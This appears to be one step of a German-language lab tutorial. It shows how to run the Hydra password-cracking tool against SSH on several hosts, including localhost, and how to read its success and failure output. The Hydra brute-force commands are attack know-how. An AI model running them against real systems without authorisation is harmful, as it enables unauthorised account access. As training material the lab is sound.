Überprüfen der Ausgabe für mehrere Hosts
In diesem Schritt lernen Sie, wie Sie die Ausgabe von Hydra interpretieren können, wenn Sie mehrere Hosts angreifen. Die Ausgabe von Hydra liefert wertvolle Informationen über den Erfolg oder das Scheitern der Angriffsversuche.
Wenn Hydra ein Passwort erfolgreich knackt, wird es die Anmeldeinformationen im folgenden Format anzeigen:
[<service>] host: <host> login: <username> password: <password>
Beispiel:
[ssh] 192.168.1.100:22 login: root password: password
Dies zeigt an, dass Hydra das SSH-Passwort für den Benutzer root
auf dem Host 192.168.1.100
erfolgreich knackt hat und das Passwort password
ist.
Wenn Hydra es nicht schafft, ein Passwort zu knacken, wird es in der Regel eine Fehlermeldung wie "Login failed" (Anmeldung fehlgeschlagen) oder "Invalid credentials" (Ungültige Anmeldeinformationen) anzeigen.
Analysieren wir die Ausgabe aus den vorherigen Schritten.
-
Führen Sie den Hydra-Befehl aus dem vorherigen Schritt erneut aus:
hydra -L ~/project/users.txt -P ~/project/passwords.txt -t 4 -M ~/project/targets.txt ssh
-
Untersuchen Sie die Ausgabe. Sie werden wahrscheinlich eine Reihe von "Login failed" oder "Invalid credentials" -Meldungen für jeden Zielhost sehen. Dies liegt daran, dass der von Ihnen verwendete Benutzername und das Passwort wahrscheinlich falsch sind.
Die Ausgabe könnte in etwa so aussehen:
Hydra v9.6 (c) 2024 by van Hauser/THC - use freely but only for legal purposes.
Hydra starting at 2024-10-27 10:00:00
[DATA] 1 task, 3 servers, 1 userfiles, 1 passfiles -> max 1 task per 1 server, overall 1 task per attack
[DATA] attacking ssh://192.168.1.100:22
[STATUS][ssh] 192.168.1.100:22 - Login failed for user 'root'
[DATA] attacking ssh://192.168.1.101:22
[STATUS][ssh] 192.168.1.101:22 - Login failed for user 'root'
[DATA] attacking ssh://192.168.1.102:22
[STATUS][ssh] 192.168.1.102:22 - Login failed for user 'root'
Hydra finished.
Wenn Hydra es schafft, ein Passwort zu knacken, würden Sie eine Zeile ähnlich dem obigen Beispiel sehen, die die erfolgreichen Anmeldeinformationen anzeigt.
-
Um einen erfolgreichen Login besser zu veranschaulichen, erstellen wir ein Szenario, in dem Hydra eher erfolgreich sein wird. Dies erfordert einen anfälligen SSH-Server. Da wir keinen solchen Server zur Hand haben, ändern wir die Datei targets.txt
, um auf localhost
zu verweisen, und versuchen, uns als aktueller Benutzer anzumelden. Dies wird wahrscheinlich immer noch fehlschlagen, aber es ist das Nächste, was wir an einem "erfolgreichen" Szenario ohne einen speziell anfälligen Zielhost erreichen können.
Fügen Sie zunächst 127.0.0.1
Ihrer Datei targets.txt
hinzu:
echo "127.0.0.1" >> ~/project/targets.txt
Versuchen Sie nun, das SSH-Passwort für den aktuellen Benutzer (labex) auf localhost
zu knacken. Sie müssen das Passwort für den Benutzer labex
kennen. Wenn Sie keines festgelegt haben, können Sie versuchen, die Passwortliste leer zu lassen, was einen Null-Passwort-Versuch auslöst.
hydra -l labex -P ~/project/passwords.txt -t 4 -M ~/project/targets.txt ssh
Hinweis: Dies wird wahrscheinlich immer noch fehlschlagen, es sei denn, Sie haben ein sehr einfaches Passwort für den Benutzer labex
oder haben das Passwortlose SSH-Login erlaubt.
Selbst wenn der Angriff fehlschlägt, ist das Wichtigste, dass Sie verstehen, wie Sie die Ausgabe von Hydra interpretieren können. Suchen Sie nach den Zeilen, die einen erfolgreichen Login anzeigen, und achten Sie auf die Fehlermeldungen, um zu verstehen, warum die Angriffe fehlschlagen.
In diesem Schritt haben Sie gelernt, wie Sie die Ausgabe von Hydra überprüfen können, wenn Sie mehrere Hosts angreifen, und wie Sie die Ergebnisse interpretieren können. Dies ist eine entscheidende Fähigkeit, um den Erfolg oder das Scheitern Ihrer Passwort-Cracking-Versuche zu verstehen.